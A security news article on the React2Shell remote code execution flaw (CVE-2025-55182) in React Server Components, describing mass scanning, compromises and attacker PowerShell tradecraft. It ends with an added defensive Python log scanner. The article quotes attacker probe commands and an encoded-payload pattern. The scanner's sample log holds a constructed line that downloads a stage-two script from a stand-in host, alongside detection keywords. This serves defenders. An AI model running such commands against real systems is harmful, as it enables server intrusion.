When Cloudflare pushed an emergency Web Application Firewall update to block a newly disclosed React Server Components flaw, the fix accidentally caused a major outage. The reason behind this rushed patch was far more serious. The vulnerability, known as React2Shell (CVE-2025-55182), is a critical remote code execution flaw that attackers began exploiting within hours of its public disclosure. Since the bug affects React Server Components and frameworks built on top of them, including Next.js, the potential impact is huge.
What is React2Shell?
React2Shell is an unauthenticated remote code execution vulnerability. It originates from unsafe deserialization inside React Server Components. Because of this, an attacker only needs one malicious HTTP request to run arbitrary commands on a vulnerable server.
Any app running React Server Components, especially Next.js apps, is at risk unless developers update, rebuild, and redeploy their applications.
On December 4, a security researcher released a working proof-of-concept. This helped defenders understand the flaw better, but it also accelerated attacks. Automated scanners, botnets, and threat actors immediately started probing the internet for unpatched servers.
By now, multiple security teams have confirmed massive scanning activity targeting this flaw. Shadowserver’s global scan detected 77,664 vulnerable IP addresses, with around 23,700 in the United States alone. These numbers represent only public-facing servers, so the real exposure may be even larger.
Researchers confirmed exposure by sending a crafted HTTP request and analysing the server’s response. If the server responded in a specific way, it meant the target was vulnerable.
GreyNoise also tracked over 180 unique IP addresses actively attempting to exploit the bug within a 24-hour window. Most of this traffic is automated and distributed across countries such as China, the Netherlands, the United States, and Hong Kong.
Palo Alto Networks revealed that over 30 organisations have already been compromised. Attackers exploited React2Shell to:
- Run arbitrary commands
- Perform reconnaissance
- Attempt to steal AWS configuration and credential files
Some intrusions have been linked to state-associated Chinese threat actors, including groups known for initial access operations and long-term espionage.
How attackers are exploiting the flaw
Most attackers begin with harmless-looking PowerShell math commands, such as:
powershell -c "40138*41979"
powershell -c "40320*43488"
These commands do not raise suspicion, but they confirm remote code execution on the server. Once confirmed, attackers switch to base64-encoded PowerShell payloads:
powershell -enc <base64>
These payloads often download further scripts directly into memory. In some cases, the scripts disable Windows AMSI (Anti-Malware Scan Interface) to bypass endpoint security tools.
GreyNoise and VirusTotal reports show attackers installing Cobalt Strike beacons, giving them long-term access inside networks.
Because the vulnerability is easy to exploit and already weaponised, companies worldwide are racing to patch and redeploy their applications. Even Cloudflare’s own emergency mitigation led to accidental downtime, showing how urgent and critical the situation has become. CISA has included CVE-2025-55182 in its Known Exploited Vulnerabilities (KEV) catalog. US federal agencies are required to patch it by December 26, 2025.
If you use React Server Components or frameworks that depend on them, you should update to the latest React version, rebuild and redeploy your application. Check logs for any suspicious PowerShell or shell commands and review outbound traffic patterns to look for Cobalt Strike-like behaviour.
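As an added example, not code from the article or from any of the vendors it cites: a small Python scanner that applies the log check recommended above to process command lines, flagging the two stages described in the article (arithmetic probes such as `powershell -c "40138*41979"` that confirm code execution, and `powershell -enc <base64>` payloads, which it decodes from PowerShell's UTF-16LE base64 form). The log lines and the stage-two script text are constructed for the example.

```python
import base64
import re
from typing import Optional

# Stage 1: arithmetic "does it execute?" probes, e.g. powershell -c "40138*41979"
ARITH_PROBE = re.compile(
    r'powershell(?:\.exe)?\s+-c(?:ommand)?\s+"?\s*\d+\s*\*\s*\d+\s*"?', re.IGNORECASE)
# Stage 2: encoded payloads, e.g. powershell -enc <base64>  (-ec / -e / -EncodedCommand aliases)
ENC_PAYLOAD = re.compile(
    r'powershell(?:\.exe)?\s+-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
# Strings in the decoded script that match the behaviour described in the article
# (in-memory download of further scripts, tampering with AMSI).
SUSPICIOUS_KEYWORDS = ("amsi", "downloadstring", "invoke-webrequest", "invoke-expression")


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; return '' if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_command(line: str) -> Optional[dict]:
    """Return a finding dict for a suspicious command line, or None."""
    enc = ENC_PAYLOAD.search(line)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
        hits = [k for k in SUSPICIOUS_KEYWORDS if k in decoded.lower()]
        return {"stage": "encoded_payload", "command": line, "decoded": decoded, "keywords": hits}
    if ARITH_PROBE.search(line):
        return {"stage": "arith_probe", "command": line, "decoded": "", "keywords": []}
    return None


def scan_log(lines) -> list:
    """Run classify_command over every line and keep the findings, in log order."""
    return [f for f in map(classify_command, lines) if f]


# Constructed sample: command lines spawned by a web-app process (not real captured data).
STAGE2 = "Invoke-WebRequest http://example.invalid/stage2.ps1"  # constructed stage-two script
SAMPLE_LOG = [
    "node.exe /app/.next/server.js",
    'powershell -c "40138*41979"',
    'powershell -c "40320*43488"',
    "powershell -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode(),
    'powershell -c "Get-Date"',  # ordinary admin use, must not be flagged
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["stage"], "|", finding["command"][:40], "|", finding["keywords"])
```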